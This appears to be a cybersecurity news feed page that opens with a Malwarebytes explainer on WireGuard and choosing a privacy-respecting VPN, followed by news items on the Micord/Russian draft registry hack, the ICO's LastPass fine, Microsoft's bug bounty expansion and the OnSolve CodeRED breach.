What is WireGuard and why is it such a big deal?
WireGuard isn’t a VPN service. It’s the protocol that powers many modern VPNs, including Malwarebytes Privacy VPN. It’s the engine that handles encryption and securely routes your traffic.
WireGuard is the superstar of the VPN world. Unlike clunkier, older protocols (like OpenVPN or IPsec), it’s deliberately lean and built for the modern internet. Its small codebase is easier to audit and leaves fewer places for bugs to hide. It’s fully open-source, so researchers can dig into exactly how it works.
Its cryptography is fast, efficient, and modern with strong encryption, solid key exchange, and lightweight hashing that reduces overhead. In practice, that means better privacy and better performance without a provider having to gather connection data just to keep speeds usable.
Of course, WireGuard is just the foundation. Each VPN implements it differently. The better ones add privacy-friendly tweaks like rotating IP addresses or avoiding static identifiers so that even they can’t link sessions back to individual users.
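To make that leanness concrete, here is a minimal, illustrative WireGuard client configuration. The keys, addresses, and endpoint below are placeholders, not values from any real provider:

```ini
[Interface]
# The client's private key (placeholder; generate a real one with `wg genkey`)
PrivateKey = <client-private-key>
# The address this client uses inside the tunnel
Address = 10.0.0.2/32
DNS = 10.0.0.1

[Peer]
# The provider's server public key and endpoint (placeholders)
PublicKey = <server-public-key>
Endpoint = vpn.example.com:51820
# Send all IPv4 and IPv6 traffic through the tunnel
AllowedIPs = 0.0.0.0/0, ::/0
```

That handful of lines is an entire tunnel definition; an equivalent OpenVPN setup typically runs to dozens of directives plus certificate files.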
How to compare VPNs
With VPN usage rising, especially where new age-verification rules have sparked debate about whether VPNs might face future scrutiny, it’s more important than ever to choose providers with strong, transparent privacy practices.
When you boil it down, a handful of questions reveal almost everything about how a VPN treats your privacy:
- Who controls the infrastructure?
- Are the servers RAM-only?
- Which protocol is used, and how is it implemented?
- What laws apply to the company?
- Have experts audited the service?
- Do transparency reports or warrant canaries exist and stay updated?
- Can you sign up and pay without giving away your entire identity?
If a VPN provider gets evasive about any of this, or runs its service “for free” while collecting data to make the numbers work, that tells you almost everything you need to know.

Why infrastructure ownership matters
One of the most revealing questions you can ask is deceptively simple: Who actually owns the servers?
Most VPNs rent hardware from large data centers or cloud platforms. When they do, your traffic travels through machines managed not only by the VPN’s engineers, but also by whoever runs those facilities. That introduces an access question: Who else has their hands on the hardware?
When a VPN owns and operates its equipment, including racks and networking gear, it reduces the number of unknowns dramatically. The fewer third parties in the chain, the easier it is to stand behind privacy guarantees.
RAM-only (diskless) servers: the gold standard
RAM-only servers take this a step further. Because everything runs in memory, nothing is ever written to a hard drive. Pull the plug and the entire working state disappears instantly, like wiping a whiteboard clean. That means no logs sitting quietly on a disk, nothing for an intruder or authorities to seize, and nothing left behind if ownership, personnel, or legal circumstances change.
This setup also tends to go hand-in-hand with owning the hardware. Most public cloud environments simply don’t allow true diskless deployments with full control over the underlying machine.
Other privacy features to watch for
Even with strong infrastructure and protocols, the details still matter. A solid kill switch keeps your traffic from leaking if the connection drops. Private DNS prevents queries from being routed through third parties. Multi-hop routes make correlation attacks harder. And torrent users may want carefully implemented port forwarding that doesn’t introduce side channels.
These aren’t flashy features, but they show whether a provider has considered the full privacy landscape, not just the obvious parts.
Audits and transparency reports
A provider that truly stands behind its privacy claims will welcome outside inspection. Independent audits, published findings, and ongoing transparency reports help confirm whether logging is disabled in practice, not just in principle. Some companies also maintain warrant canaries (more on this below). None of these are perfect, but together they paint a clear picture of how seriously the VPN treats user trust.
A warrant canary in the VPN coalmine
Okay, so here’s something interesting: some companies use something called a “warrant canary” to quietly let us know if they’ve received a top-secret government request for data. Here’s the deal…it’s illegal for them to simply tell us, “Hey, the government’s snooping around.” So, instead, they publish a simple statement that says something like, “As of January 2026, we haven’t received any secret orders for your data.”
The clever part is that they update this statement on a regular basis. If it suddenly disappears or just stops getting updated, it could mean the company got hit with one of these hush-hush requests and legally can’t talk about it. It’s like the digital version of a warning signal. It is nothing flashy, but if you’re paying attention, you’ll spot when something changes.
It’s not a perfect system (and who knows what the courts will think of it in the future), but a warrant canary is one way companies try to be on our side, finding ways to keep us in the loop even when they’re told to stay silent. So, give an extra ounce of trust to companies that publish these regularly.
Where privacy-first VPNs are heading
Expect to see continued evolution: new cryptography built for a post-quantum world, more transparency from providers, decentralized and community-run VPN options, and tighter integration with secure messaging, encrypted DNS, and whatever comes next.
It’s also worth keeping an eye on how governments respond to rising VPN use. In the UK, for example, new age-verification rules triggered a huge spike in VPN sign-ups and a public debate about whether VPN usage should be monitored more closely. There’s no proposal to restrict or ban VPNs, but the conversation is active.
If you care about your privacy online, don’t settle for slick marketing. Look for the real foundations like modern protocols, owned and well-managed infrastructure, RAM-only servers, regular audits, and a culture that treats transparency as a habit, not a stunt.
Privacy is engineered, not simply promised. With the right VPN, you stay in control of your digital life instead of hoping someone else remembers to keep your secrets safe.
We don’t just report on privacy—we offer you the option to use it.
Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.
ICO Fines LastPass £1.2m After 2022 Breach
Encouraging Industry Voices to Write for the Commentary Section
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work
New React RSC Vulnerabilities Enable DoS and Source Code Exposure
React2Shell Exploitation Escalates into Large-Scale Global Attacks, Forcing Emergency Mitigation
Russia’s Digital Military Draft System Hit by Cyberattack, Source Code Leaked
Cyberattack on Russia’s Digital Military Draft System
Micord’s website was reportedly inaccessible on Thursday, displaying a notice that it was under “technical maintenance.” Meanwhile, the investigative outlet IStories, which obtained the documents from Idite Lesom, confirmed the breach with Micord’s director, Ramil Gabdrahmanov. “Listen, it could happen to anyone. Many are being attacked right now,” Gabdrahmanov said. He declined to confirm whether Micord had worked on Russia’s unified military registration database, stating, “We work on many different projects.” Nonetheless, IStories independently verified Micord’s involvement in the digital registry. Despite the cyberattack on Russia’s digital military draft system, some users reported that the database website was still accessible, though it remained unclear whether electronic draft summonses had been disrupted. The Russian Defense Ministry dismissed the claims of a breach as “fake news,” asserting that the registry continued to operate normally. “The registry has been repeatedly subjected to hacking attacks. They have all been successfully repelled,” the ministry said, emphasizing that attempts to disrupt the system had so far “failed to achieve their objectives,” reported IStories.
Digital Military Draft System: Modernizing Russia’s Draft Process
The digital military draft system, part of a broader modernization of Russia’s wartime enlistment process, centralizes records of men aged 18 to 30 and allows authorities to issue summonses online, eliminating the need for in-person notifications. The system has faced multiple delays, with its initial launch scheduled for November 2024. Russia’s fall 2025 draft, which runs from October 1 to December 31, was expected to rely on this digital registry in four regions, including Moscow. Sverdlin noted that once fully operational, the online system automatically enforces restrictions on draftees who fail to report for compulsory service, including travel bans.
Origins and Government Plans for the Unified Registry
The hacker group reportedly remained in Micord’s system for several months, accessing critical infrastructure, operational correspondence, and the source code, which they claimed to have destroyed. The documents were shared with journalists at IStories, who confirmed their authenticity. The Russian government first announced plans for a unified digital military registration registry in April 2023, when the State Duma passed a bill creating the system. RT Labs, a Rostelecom subsidiary, was initially named as one of the developers. In February 2024, Rostelecom was designated as the sole contractor to complete the system for the Ministry of Digital Development, Communications, and Mass Media, with a completion deadline of December 31, 2024. Though initially intended for the 2024 fall draft, the registry became fully operational only in October 2025, with several regions adopting electronic summonses and phasing out paper notifications.
Password Manager LastPass Penalized £1.2m by ICO for Security Failures
Incident One: Corporate Laptop Compromised
The first incident involved the corporate laptop of a LastPass employee based in Europe. A hacker gained access to the company’s development environment and obtained encrypted company credentials. Although no personal information was taken at this stage, the credentials could have provided access to the backup database if decrypted. LastPass attempted to mitigate the hacker’s activity and believed the encryption keys remained safe, as they were stored outside the compromised environment in the vaults of four senior employees.
Incident Two: Personal Device Targeted
The second incident proved more damaging. The hacker targeted one of the senior employees who had access to the decryption keys. Exploiting a known vulnerability in a third‑party streaming service, the attacker gained access to the employee’s personal device. A keylogger was installed, capturing the employee’s master password. Multi‑factor authentication was bypassed using a trusted device cookie. This allowed the hacker to access both the employee’s personal and business LastPass vaults, which were linked by a single master password. From there, the hacker obtained the Amazon Web Service (AWS) access key and decryption key stored in the business vault. Combined with information taken the previous day, this enabled the extraction of the backup database containing customer personal information.
ICO’s Findings and Fine on LastPass UK
The ICO investigation concluded that LastPass failed to implement sufficiently strong technical and security measures, leaving customers exposed. Although the company’s zero knowledge encryption protected passwords, the exposure of personal data was deemed a serious failure. John Edwards, UK Information Commissioner, stated: “Password managers are a safe and effective tool for businesses and the public to manage their numerous login details, and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to reduce risks of attack. LastPass customers had a right to expect their personal information would be kept safe and secure. The company fell short of this expectation, resulting in the proportionate fine announced today.”
Lessons for Businesses
The ICO has urged all UK businesses to review their systems and procedures to prevent similar risks. This case underscores the importance of restricting system access, strengthening cybersecurity measures, and ensuring that employees’ personal devices do not become weak points in corporate networks. While password managers remain a recommended tool for managing login details, the incident shows that even trusted providers can fall short if internal safeguards are not sufficiently strong. The £1.2 million fine against LastPass UK Ltd serves as a clear reminder that companies handling sensitive data must uphold the highest standards of security. Although customer passwords were protected by the company’s zero knowledge encryption system, the exposure of personal information has left millions vulnerable. The ICO’s ruling reinforces the need for constant vigilance in the face of growing cyber threats. For both businesses and individuals, the message is straightforward: adopt strong security practices, conduct regular system reviews, and implement robust employee safeguards to reduce the risk of future data breaches.
AI Threat Detection: How Machines Spot What Humans Miss
Discover how AI strengthens cybersecurity by detecting anomalies, stopping zero-day and fileless attacks, and enhancing human analysts through automation.
The post AI Threat Detection: How Machines Spot What Humans Miss appeared first on Security Boulevard.
Microsoft Bug Bounty Program Gets Major Expansion With ‘In Scope By Default’
A Strategic Shift in Bug Bounty Security Incentives
Tom Gallagher, vice president of engineering at the Microsoft Security Response Center (MSRC), highlighted the significance of the change in a December 11, 2025, blog post. He described it as more than an administrative adjustment, calling it a structural realignment designed to reflect real-world risk. Gallagher explained that by defaulting all services into scope, Microsoft hopes to reduce reporting delays, minimize confusion, and allow researchers to focus on vulnerabilities with meaningful impact on customers. “If Microsoft’s online services are impacted by vulnerabilities in third-party code, including open source, we want to know,” Gallagher stated. “If no bounty award formerly exists to reward this vital work, we will offer one. This closes the gap for security research and raises the security bar for everyone who relies on this code.” The new policy also allows Microsoft to collaborate more effectively with researchers on upstream or third-party vulnerabilities. The company can now assist with developing fixes or support maintainers when issues in external codebases directly affect Microsoft services.
Industry Reaction and Expected Impact
All new Microsoft online services now fall under bug bounty coverage from day one, while millions of existing endpoints no longer require manual approval to qualify. The update is designed to make it easier for security professionals to identify and report vulnerabilities across Microsoft’s expansive ecosystem. The new approach aligns with Microsoft’s broader security philosophy in an AI- and cloud-first environment, where attackers exploit any weak link, regardless of ownership. According to Gallagher, “Security vulnerabilities often emerge at the seams where components interact or where dependencies are involved. We value research that takes this broader perspective, encompassing not only Microsoft infrastructure but also third-party dependencies, including commercial software and open-source components.” Last year, Microsoft’s bug bounty program and its Zero Day Quest live-hacking event awarded over $17 million to researchers for high-impact discoveries. With the In Scope By Default initiative, the company expects to expand eligibility even further, particularly in areas involving Microsoft-owned domains, cloud services, and third-party or open-source code. Researchers participating in the program are expected to follow Microsoft’s Rules of Engagement for Responsible Security Research, ensuring customer privacy and data protection while enabling coordinated vulnerability disclosure. By widening its bug bounty scope, Microsoft aims to raise the overall security bar.
How Root Cause Analysis Improves Incident Response and Reduces Downtime?
Security incidents don’t fail because of a lack of tools; they fail because of a lack of insight. In an environment where every minute of downtime equals revenue loss, customer impact, and regulatory risk, root cause analysis has become a decisive factor in how effectively organizations execute incident response and stabilize operations. The difference between […]
The post How Root Cause Analysis Improves Incident Response and Reduces Downtime? appeared first on Kratikal Blogs.
The post How Root Cause Analysis Improves Incident Response and Reduces Downtime? appeared first on Security Boulevard.
City of Cambridge Advises Password Reset After Nationwide CodeRED Data Breach
Impact of the OnSolve CodeRED Cyberattack on User Data
According to city officials, the data breach affected CodeRED databases nationwide, including Cambridge. The compromised information may include phone numbers, email addresses, and passwords of registered users. Importantly, the attack targeted the OnSolve CodeRED system itself, not the City of Cambridge or its departments. This OnSolve CodeRED cyberattack incident mirrors similar concerns raised in Monroe County, Georgia, where officials confirmed that residents’ personal information was also exposed. The Monroe County Emergency Management Agency emphasized that the breach was part of a nationwide cybersecurity incident and not a local failure.
Transition to CodeRED by Crisis24
In response, OnSolve permanently decommissioned the old CodeRED platform and migrated services to a new, secure environment known as CodeRED by Crisis24. The new system has undergone comprehensive security audits, including penetration testing and system hardening, to ensure stronger protection against future threats. For Cambridge residents, previously registered contact information has been imported into the new platform. However, due to security concerns, all passwords have been removed. Users must now reset their credentials before accessing their accounts.
Steps for City of Cambridge Residents and Users
To continue receiving emergency notifications, residents should:
- Visit accountportal.onsolve.net/cambridgema
- Enter their username (usually an email address)
- Select “forgot password” to verify and reset credentials
- If unsure of their username, use the “forgot username” option
Broader National Context
The Monroe County cyberattack highlights the scale of the issue. Officials there reported that data such as names, addresses, phone numbers, and passwords were compromised. Residents who enrolled before March 31, 2025, had their information migrated to the new Crisis24 CodeRED platform, while those who signed up afterward must re‑enroll. OnSolve has reassured communities that the intrusion was contained within the original system and did not spread to other networks. While there is currently no evidence of identity theft, the incident underscores the growing risks of cyber intrusions nationwide.
Resources for Cybersecurity Protection
Residents who believe they may have been victims of cyber‑enabled fraud are encouraged to report incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov. Additional resources are available to help protect individuals and families from fraud and cybercrime. Security experts note that the rising frequency of attacks highlights the importance of independent threat‑intelligence providers. Companies such as Cyble track vulnerabilities and cybercriminal activity across global networks, offering organizations tools to strengthen defenses and respond more quickly to incidents.
Looking Ahead
The City of Cambridge has thanked residents for their patience as staff worked with OnSolve to restore emergency alert capabilities. Officials emphasized that any breach of security is a serious concern and confirmed that they will continue monitoring the new CodeRED by Crisis24 platform to ensure its standards are upheld. In addition, the City is evaluating other emergency alerting systems to determine the most effective long‑term solution for community safety.
Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know
As the clock ticks down to the full enforcement of Hong Kong’s Protection of Critical Infrastructures (Computer Systems) Ordinance on January 1, 2026, designated operators of Critical Infrastructures (CI) and Critical Computer Systems (CCS) must act decisively. This landmark law mandates robust cybersecurity measures for Critical Computer Systems (CCS) to prevent disruptions, with non-compliance risking […]
The post Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know appeared first on NSFOCUS, Inc.
The post Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know appeared first on Security Boulevard.
Learn about changes to your online account management
Discover the latest changes in online account management, focusing on Enterprise SSO, CIAM, and enhanced security. Learn how these updates streamline login processes and improve user experience.
The post Learn about changes to your online account management appeared first on Security Boulevard.